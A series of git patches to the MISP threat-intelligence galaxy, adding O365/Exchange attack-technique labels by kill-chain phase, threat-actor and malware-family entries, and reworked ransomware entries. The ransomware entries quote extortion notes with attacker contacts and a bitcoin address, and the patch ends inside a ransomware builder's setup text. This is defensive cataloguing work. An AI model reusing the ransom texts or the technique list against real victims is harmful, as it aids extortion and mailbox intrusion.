b/clusters/o365-exchange-techniques.json index 5dbe500..fdcd02e 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -189,6 +189,66 @@ }, "uuid": "cf8df948-0332-4ec7-94f3-3f6d54bbcbb9", "value": "On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler" + }, + { + "description": "O365 - Add Mail forwarding rule", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "value": "O365 - Add Mail forwarding rule" + }, + { + "description": "O365 - Add Global admin account", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "a9c1f718-b9bf-4efc-9fa1-852b6c93f725", + "value": "O365 - Add Global admin account" + }, + { + "description": "O365 - Delegate Tenant Admin", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "value": "O365 - Delegate Tenant Admin" + }, + { + "description": "End Point - Persistence throught Outlook Home Page: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "708790c8-3e6f-4dd3-8f89-0651ef71dfe0", + "value": "End Point - Persistence throught Outlook Home Page: SensePost Ruler" + }, + { + "description": "End Point - Persistence throught custom Outlook form", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "aadc2552-97db-419c-a414-5c1f862d38ef", + "value": "End Point - Persistence throught custom Outlook form" + }, + { + "description": "End Point - Create Hidden Mailbox Rule", + "meta": { + "kill_chain": [ + "tactics:Persistence" + ] + }, + "uuid": "d023f254-466b-436b-acfd-beea54c323b1", + "value": "End Point - Create Hidden Mailbox Rule" } ], "version": 1 From 5d1565152cb88dfba911f310bb384552f64aa311 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 18:19:00 +0200 Subject: [PATCH 39/50] chg: [o365-exchange-techniques] Expansion added (WiP) --- clusters/o365-exchange-techniques.json | 80 ++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index fdcd02e..2f9816f 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -249,6 +249,86 @@ }, "uuid": "d023f254-466b-436b-acfd-beea54c323b1", "value": "End Point - Create Hidden Mailbox Rule" + }, + { + "description": "O365 - MailSniper: Search Mailbox for credentials", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "fccf7c5a-7d2c-413b-ae45-d5ab226c8ba8", + "value": "O365 - MailSniper: Search Mailbox for credentials" + }, + { + "description": "O365 - Search for Content with eDiscovery", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "fe65c7ed-7129-4591-a82e-a223b0cdbf14", + "value": "O365 - Search for Content with eDiscovery" + }, + { + "description": "O365 - Account Takeover: Add-MailboxPermission", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "19f22ecb-8470-4f69-a763-46a19afe6c5d", + "value": "O365 - Account Takeover: Add-MailboxPermission" + }, + { + "description": "O365 - Pivot to On-Prem host: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "c0010a9d-666e-4cfd-a9b3-21f5861ecdf6", + "value": "O365 - Pivot to On-Prem host: SensePost Ruler" + }, + { + "description": "O365 - Exchange Tasks for C2: MWR", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "9ada2a83-c632-4c9c-91cd-b1d7b947e44a", + "value": "O365 - Exchange Tasks for C2: MWR" + }, + { + "description": "O365 - Send Internal Email", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "685af033-af7b-4582-a539-5f1f9080fd98", + "value": "O365 - Send Internal Email" + }, + { + "description": "On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "0f33ff1e-2305-4239-8d30-38edcfe2511a", + "value": "On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)" + }, + { + "description": "On-Prem Exchange - Delegation", + "meta": { + "kill_chain": [ + "tactics:Expansion" + ] + }, + "uuid": "a69da576-7ed2-4b29-8c4a-6c16bd2c2a54", + "value": "On-Prem Exchange - Delegation" } ], "version": 1 From 678b2a56219906b17a40b84b4c5ab6bc4c262a72 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 18:25:01 +0200 Subject: [PATCH 40/50] chg: [o365-exchange-techniques] Actions on Intent added (finalized) --- clusters/o365-exchange-techniques.json | 40 ++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index 2f9816f..782dd9f 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -329,6 +329,46 @@ }, "uuid": "a69da576-7ed2-4b29-8c4a-6c16bd2c2a54", "value": "On-Prem Exchange - Delegation" + }, + { + "description": "O365 - MailSniper: Search Mailbox for content", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "ae6eb93b-503f-49b5-98db-3f282551facb", + "value": "O365 - MailSniper: Search Mailbox for content" + }, + { + "description": "O365 - Search for Content with eDiscovery", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "8ac66795-5e59-4993-973b-b6efd78fb1c8", + "value": "O365 - Search for Content with eDiscovery" + }, + { + "description": "O365 - Exfiltration email using EWS APIs with PowerShell", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "4d67a417-169c-47d0-a7fa-d710b9e2f611", + "value": "O365 - Exfiltration email using EWS APIs with PowerShell" + }, + { + "description": "O365 - Download documents and email", + "meta": { + "kill_chain": [ + "tactics:Actions on Intent" + ] + }, + "uuid": "1ccc00f8-d4b5-4c72-a7c0-a53127497a7c", + "value": "O365 - Download documents and email" } ], "version": 1 From 9ad5279939670b5c79ab5b6044e7b60805d37112 Mon Sep 17 00:00:00 2001 From: mokaddem Date: Mon, 13 May 2019 10:59:30 +0200 Subject: [PATCH 41/50] chg: [attack-pattern] Sync kill-chain with data from MITRE. --- galaxies/mitre-attack-pattern.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/galaxies/mitre-attack-pattern.json b/galaxies/mitre-attack-pattern.json index 17eebea..930ce96 100644 --- a/galaxies/mitre-attack-pattern.json +++ b/galaxies/mitre-attack-pattern.json @@ -12,8 +12,9 @@ "discovery", "lateral-movement", "collection", + "command-and-control", "exfiltration", - "command-and-control" + "impact" ], "mitre-mobile-attack": [ "initial-access", @@ -26,6 +27,7 @@ "effects", "collection", "exfiltration", + "command-and-control", "network-effects", "remote-service-effects" ], @@ -51,5 +53,5 @@ "namespace": "mitre-attack", "type": "mitre-attack-pattern", "uuid": "c4e851fa-775f-11e7-8163-b774922098cd", - "version": 7 + "version": 8 } From 59869bf145b82f94c420c6c154e87bb3689a16b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Mon, 13 May 2019 11:15:38 +0200 Subject: [PATCH 42/50] fix: o365-exchange-techniques (duplicate values, duplicate UUIDs) --- clusters/o365-exchange-techniques.json | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index 782dd9f..1fc14b6 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -217,7 +217,7 @@ "tactics:Persistence" ] }, - "uuid": "80308e39-11e9-45b2-b6d2-f13f3de509ab", + "uuid": "2f10dbd7-89e4-4929-8bdc-8ca167f08ace", "value": "O365 - Delegate Tenant Admin" }, { @@ -264,7 +264,8 @@ "description": "O365 - Search for Content with eDiscovery", "meta": { "kill_chain": [ - "tactics:Expansion" + "tactics:Expansion", + "tactics:Actions on Intent" ] }, "uuid": "fe65c7ed-7129-4591-a82e-a223b0cdbf14", @@ -340,16 +341,6 @@ "uuid": "ae6eb93b-503f-49b5-98db-3f282551facb", "value": "O365 - MailSniper: Search Mailbox for content" }, - { - "description": "O365 - Search for Content with eDiscovery", - "meta": { - "kill_chain": [ - "tactics:Actions on Intent" - ] - }, - "uuid": "8ac66795-5e59-4993-973b-b6efd78fb1c8", - "value": "O365 - Search for Content with eDiscovery" - }, { "description": "O365 - Exfiltration email using EWS APIs with PowerShell", "meta": { @@ -371,5 +362,5 @@ "value": "O365 - Download documents and email" } ], - "version": 1 + "version": 2 } From 2c3424b331d193f3c3394f0989c8f95a16e5b1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Mon, 13 May 2019 11:27:39 +0200 Subject: [PATCH 43/50] chg: Add PyMISPGalaxies test --- .travis.yml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index c413fe7..cd40f33 100644 --- a/.travis.yml +++ b/.travis.yml @@ -3,14 +3,27 @@ language: python cache: pip python: - - "3.6" + - "3.6-dev" + - "3.7-dev" sudo: required install: - sudo apt-get update -qq - sudo apt-get install -y -qq jq moreutils - - pip install jsonschema + - pip install jsonschema pipenv + - pushd .. + # Install PyMISPGalaxies + - git clone https://github.com/MISP/PyMISPGalaxies.git + - pushd PyMISPGalaxies + - git submodule update --init + - git submodule foreach git pull origin master + - pipenv install -d + - popd + - popd script: - ./validate_all.sh + - pushd ../PyMISPGalaxies + - pipenv run nosetests-3.4 --with-coverage --cover-package=pymispgalaxies -d + - popd From a20f7fbe918311f2e14e66fd15d75cea053d717c Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Wed, 15 May 2019 22:43:33 +0200 Subject: [PATCH 44/50] adding APT31/ZIRCONIUM --- clusters/threat-actor.json | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 99b0e6f..a903dae 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6709,7 +6709,24 @@ }, "uuid": "5059b44d-2753-4977-b987-4922f09afe6b", "value": "Silent Librarian" + }, + { + "description": "FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competetive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government.", + "meta": { + "country": "CN", + "refs": [ + "https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/", + "https://duo.com/decipher/apt-groups-moving-down-the-supply-chain", + "https://github.com/GuardaCyber/APT-Groups-and-Operations/blob/master/Reports/FireEye%20Intel%20-%20APT31%20Threat%20Group%20Profile.pdf" + ], + "synonyms": [ + "APT 31", + "ZIRCONIUM" + ] + }, + "uuid": "6bf7e6b6-5917-45a6-9567-f0baba79768c", + "value": "APT31" } ], - "version": 109 + "version": 110 } From 9f801122dad666686a806887e6aef577cbcf94d1 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 16 May 2019 15:45:03 +0200 Subject: [PATCH 45/50] add Reaver and probably related tools --- clusters/tool.json | 81 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 81 insertions(+) diff --git a/clusters/tool.json b/clusters/tool.json index bbf8b5c..c7917a5 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7681,6 +7681,87 @@ }, "uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e", "value": "Scranos" + }, + { + "description": "Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" + ] + }, + "related": [ + { + "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "value": "Reaver" + }, + { + "description": "The Citizen Lab analyzed a malicious email sent to Tibetan organizations in June 2013. The email in question purported to be from a prominent member of the Tibetan community and repurposed content from a community mailing list. Attached to the email were what appeared to be three Microsoft Word documents (.doc), but which were trojaned with a malware family we call “Surtr”.1 All three attachments drop the exact same malware. We have seen the Surtr malware family used in attacks on Tibetan groups dating back to November 2012.", + "meta": { + "refs": [ + "https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/", + "https://otx.alienvault.com/pulse/588a7c8fe4166d1d84244b9a" + ] + }, + "related": [ + { + "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "value": "SURTR" + }, + { + "description": "SunOrcal is a trojan malware family whose activity dates back to at least 2013. A version discovered in November 2017 incorporates steganography techniques and can collect C2 information via GitHub, obscuring its C2 infrastructure and evading detection using the legitimate site for its first beacon. The threat actors have targeted users in the Vietnam area, spreading phishing emails containing malicious documents purportedly regarding South China Sea disputes. The new SunOrcal version has also been used with the recently discovered Reaver trojan and the original SunOrcal version. Some of the recent activity also incorporates the use of the Surtr malware.", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sunorcal-adds-github-steganography-repertoire-expands-vietnam-myanmar/", + "https://www.cyber.nj.gov/threat-profiles/trojan-variants/sunorcal" + ] + }, + "related": [ + { + "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "value": "SunOrcal" } ], "version": 121 From 380006ecbb6ed49600ab750768072da8a24616e4 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Thu, 16 May 2019 23:57:49 +0530 Subject: [PATCH 46/50] merging Pacifier & Turla --- clusters/threat-actor.json | 23 +++++------------------ 1 file changed, 5 insertions(+), 18 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index a903dae..1ea5e19 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2312,7 +2312,8 @@ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.cfr.org/interactive/cyber-operations/turla", "https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "Turla", @@ -2326,7 +2327,9 @@ "Pfinet", "TAG_0530", "KRYPTON", - "Hippo Team" + "Hippo Team", + "Pacifier APT", + "Popeye" ] }, "related": [ @@ -2988,22 +2991,6 @@ "uuid": "bb446dc2-4fee-4212-8b2c-3ffa2917e338", "value": "ScarCruft" }, - { - "description": "Bitdefender detected and blocked an ongoing cyber-espionage campaign against Romanian institutions and other foreign targets. The attacks started in 2014, with the latest reported occurrences in May of 2016. The APT, dubbed Pacifier by Bitdefender researchers, makes use of malicious .doc documents and .zip files distributed via spear phishing e-mail.", - "meta": { - "attribution-confidence": "50", - "country": "RU", - "refs": [ - "http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" - ], - "synonyms": [ - "Skipper", - "Popeye" - ] - }, - "uuid": "32db3cc1-bb79-4b08-a7a4-747a37221afa", - "value": "Pacifier APT" - }, { "description": "This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder", "meta": { From 1cc0137c387904636f6ceb558f6515ad96b02ea3 Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Fri, 17 May 2019 17:36:57 +0200 Subject: [PATCH 47/50] adding TA542 to MUMMY SPIDER (emotet) --- clusters/threat-actor.json | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 1ea5e19..f8a872c 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6378,7 +6378,11 @@ "meta": { "refs": [ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/" + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service" + ], + "synonyms": [ + "TA542" ] }, "uuid": "c93281be-f6cd-4cd0-a5a3-defde9d77d8b", From b4e4d2e539b7a2bc149a51511a6e84f235099b4e Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 23 May 2019 12:39:33 +0200 Subject: [PATCH 48/50] rework of ransomware galaxy --- clusters/ransomware.json | 1364 +++++++++++++++++++++++--------------- 1 file changed, 825 insertions(+), 539 deletions(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 345a723..7ea0968 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -20,7 +20,7 @@ ], "payment-method": "Bitcoin", "price": "1(300$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-OkiR6pVmYUw/WMFiLGPuJhI/AAAAAAAAEME/wccYzFDIzJYWKXVxaTQeB4vM-4X6h3atgCLcB/s1600/note-nhtnwcuf.gif" ], "refs": [ @@ -40,7 +40,7 @@ ], "payment-method": "Bitcoin", "price": "250 €", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-pSmSehFx0bI/WL8Rp7RoMHI/AAAAAAAAEKw/eyfsAjikl9sDHlcjdyQeRxZsLto4hxvGwCLcB/s1600/note-1-2.png" ], "refs": [ @@ -58,7 +58,7 @@ "encryption": "AES-128", "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-yTOgGw5v_vo/WMBUGHN7bnI/AAAAAAAAELY/8DDyxB4pSWgje_-iVbXgy2agNty1X6D6ACLcB/s1600/C6TUfkZWAAEewi_.jpg" ], "refs": [ @@ -77,7 +77,7 @@ "example:.encrypted.contact_here_me@india.com.enjey" ], "payment-method": "Bitcoin", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-rkOR4L9jDZc/WMG1uI6vqQI/AAAAAAAAEMk/SAu_FleTLHcagf_maS31xt3D_qnwAx2RQCLcB/s1600/note-enjey_2.png" ], "refs": [ @@ -94,7 +94,7 @@ "meta": { "date": "March 2017", "encryption": "AES-128", - "ransomnotes": [ + "ransomnotes-filenames": [ "DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com" ], "refs": [ @@ -137,7 +137,7 @@ ], "payment-method": "Bitcoin", "price": "0,0361312 (50$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-i4i0joM4qRk/WMO7sKLu4dI/AAAAAAAAENU/vLR4B1Xg39wduycHe2f0vEYSv_dtJ-gxwCLcB/s1600/note.jpg" ], "refs": [ @@ -215,7 +215,9 @@ "payment-method": "MoneyPak", "price": "300$", "ransomnotes": [ - "(TRANSLATED BY THE SITE EDITOR) YOUR FILES HAVE BEEN LOCKED WITH A PASSWORD TO GET THE PASSWORD WRITE TO US AT project34@india.com WE WILL RESPOND TO YOU WITHIN 20 HOURS IN A MESSAGE, SPECIFY YOUR IP ADDRESS. YOU CAN FIND OUT AT 2IP.RU", + "(TRANSLATED BY THE SITE EDITOR) YOUR FILES HAVE BEEN LOCKED WITH A PASSWORD TO GET THE PASSWORD WRITE TO US AT project34@india.com WE WILL RESPOND TO YOU WITHIN 20 HOURS IN A MESSAGE, SPECIFY YOUR IP ADDRESS. YOU CAN FIND OUT AT 2IP.RU" + ], + "ransomnotes-filenames": [ "ПАРОЛЬ.txt" ], "refs": [ @@ -232,7 +234,7 @@ "encryption": "AES-128", "payment-method": "Bitcoin", "price": "300$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-ZbWrN1LR-14/WMhPB7M8LBI/AAAAAAAAERQ/ZGG3RDHd8V0hwK_pf-vYChTn9VRpLBgNQCLcB/s1600/petya-based_ru_3.png" ], "refs": [ @@ -255,7 +257,7 @@ ], "payment-method": "Bitcoin", "price": "1.2683", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-OmuOKzLOHnw/WMl74fSSaJI/AAAAAAAAESg/4CsOYOSuUeEhsO4jSi6k10sbb_1NnfYxACLcB/s1600/lock-screen.jpg" ], "refs": [ @@ -276,10 +278,14 @@ ".REVENGE" ], "ransomnotes": [ - "https://2.bp.blogspot.com/-KkPVDxjy8tk/WM7LtYHmuAI/AAAAAAAAEUw/kDJghaq-j1AZuqjzqk2Fkxpp4yr9Yeb5wCLcB/s1600/revenge-note-2.jpg", - "===ENGLISH=== All of your files were encrypted using REVENGE Ransomware. The action required to restore the files. Your files are not lost, they can be returned to their normal state by decoding them. The only way to do this is to get the software and your personal decryption key. Using any other software that claims to be able to recover your files will result in corrupted or destroyed files. You can purchase the software and the decryption key by sending us an email with your ID. And we send instructions for payment. After payment, you receive the software to return all files. For proof, we can decrypt one file for free. Attach it to an e-mail.", + "===ENGLISH=== All of your files were encrypted using REVENGE Ransomware. The action required to restore the files. Your files are not lost, they can be returned to their normal state by decoding them. The only way to do this is to get the software and your personal decryption key. Using any other software that claims to be able to recover your files will result in corrupted or destroyed files. You can purchase the software and the decryption key by sending us an email with your ID. And we send instructions for payment. After payment, you receive the software to return all files. For proof, we can decrypt one file for free. Attach it to an e-mail." + ], + "ransomnotes-filenames": [ "# !!!HELP_FILE!!! #.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-KkPVDxjy8tk/WM7LtYHmuAI/AAAAAAAAEUw/kDJghaq-j1AZuqjzqk2Fkxpp4yr9Yeb5wCLcB/s1600/revenge-note-2.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html" @@ -299,10 +305,14 @@ "payment-method": "Bitcoin", "price": "150$", "ransomnotes": [ - "https://2.bp.blogspot.com/-ccU4txzjpWg/WMl33c7YD3I/AAAAAAAAESU/moLHgQnVMYstKuHKuNgWKz8VbNv5ECdzACLcB/s1600/lock-note.jpg", - "FILES NUMBERED Your local drives, network folders, your external drives are encrypted using 256-bit encryption technology, this means your files are encrypted with a key. They cannot be opened without buying a decryption program and a private key, after the purchase, our program decrypts all your files and they will work like before. If you do not buy the program within 24 hours, then all your files will be permanently deleted. See the \"My Documents\" folder for more information in the file \"Beni Oku.txt\". Contact address: d3crypt0r@lelantos.org BTC address: 13hp68keuvogyjhvlf7xqmeox8dpr8odx5 You have to pay at BTC to the above address $ 150 Bitcoin You can do this by purchasing Bitcoinat www.localbitcoins.co Information: Using a computer recovery does not help. Antivirus scanning does not help to recover files, but can lead to loss.", + "FILES NUMBERED Your local drives, network folders, your external drives are encrypted using 256-bit encryption technology, this means your files are encrypted with a key. They cannot be opened without buying a decryption program and a private key, after the purchase, our program decrypts all your files and they will work like before. If you do not buy the program within 24 hours, then all your files will be permanently deleted. See the \"My Documents\" folder for more information in the file \"Beni Oku.txt\". Contact address: d3crypt0r@lelantos.org BTC address: 13hp68keuvogyjhvlf7xqmeox8dpr8odx5 You have to pay at BTC to the above address $ 150 Bitcoin You can do this by purchasing Bitcoinat www.localbitcoins.co Information: Using a computer recovery does not help. Antivirus scanning does not help to recover files, but can lead to loss." + ], + "ransomnotes-filenames": [ "Beni Oku.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-ccU4txzjpWg/WMl33c7YD3I/AAAAAAAAESU/moLHgQnVMYstKuHKuNgWKz8VbNv5ECdzACLcB/s1600/lock-note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html", "https://twitter.com/JakubKroustek/status/842034887397908480" @@ -356,10 +366,12 @@ ".ZINO" ], "payment-method": "Bitcoin", - "ransomnotes": [ - "https://4.bp.blogspot.com/-t1Q-a7sJlag/WMw8MBNIrkI/AAAAAAAAET4/aycY-m5GXVYQjcbZJ8N0kIfUZ3onYt8AgCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "ZINO_NOTE.TXT" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-t1Q-a7sJlag/WMw8MBNIrkI/AAAAAAAAET4/aycY-m5GXVYQjcbZJ8N0kIfUZ3onYt8AgCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html", "https://twitter.com/demonslay335?lang=en", @@ -377,10 +389,12 @@ "extensions": [ ".crptxxx" ], - "ransomnotes": [ - "https://2.bp.blogspot.com/-itq9nR2EedY/WM2OPtDKCgI/AAAAAAAAEUI/KcC8vtnmlHENz0CSOvxqoYeZL8qdx1IZgCLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "HOW_TO_FIX_!.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-itq9nR2EedY/WM2OPtDKCgI/AAAAAAAAEUI/KcC8vtnmlHENz0CSOvxqoYeZL8qdx1IZgCLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html", "https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84", @@ -400,10 +414,12 @@ ], "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ - "https://4.bp.blogspot.com/-suCNGXgzWuM/WM7HPujx_qI/AAAAAAAAEUk/gIvzbsbB_BUrBmmBsgpb_8w7zjwudu_mACLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "motd.txt" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-suCNGXgzWuM/WM7HPujx_qI/AAAAAAAAEUk/gIvzbsbB_BUrBmmBsgpb_8w7zjwudu_mACLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html", "https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/", @@ -423,7 +439,7 @@ ], "payment-method": "Dollars", "price": "20 - 100", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-i5iUwC8XWDo/WM7dSVNQ8UI/AAAAAAAAEVY/uXmUErkLgHcWbfpdw1zGTvwY9DimiAH8wCLcB/s1600/lock-panel.jpg", "https://1.bp.blogspot.com/-9ovaMSUgtFQ/WM7dXo84tlI/AAAAAAAAEVc/_Zx9gZuvHA0tU9-jtzP492bXa5fQiL7kgCLcB/s1600/key-price.jpg" ], @@ -445,7 +461,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-QuBYcLAKRPU/WLnE3Rn3MhI/AAAAAAAAEH4/WnC5Ke11j4MO7wmnfqBhtA-hpx6YN6TBgCLcB/s1600/note_2.png" ], "refs": [ @@ -464,7 +480,7 @@ "extensions": [ "[file_name.file_ext].id-[UserID]__contact_me_lock2017@protonmail.com_or_lock2017@unseen.is" ], - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-FllHGqIx_JQ/WL1QF2uMCCI/AAAAAAAAEJQ/Fn-8j2t8dwgSo8YTHM1iOkL-3U_hbcaKwCLcB/s1600/Note_2.png" ], "refs": [ @@ -549,7 +565,9 @@ "payment-method": "Bitcoin", "price": "0.1", "ransomnotes": [ - "DotRansomware Setup Guide \nAttention!!! \nWe recommend you to build your ransomware inside virtual machine! (But it is safe to use builder on your PC, just don't run builded exe file on your PC!) \nRecommendation: If you have got possibility to run ransomware on victim's computer with administrator privileges then do it. Because it will provide better conversion. Recommended decryption 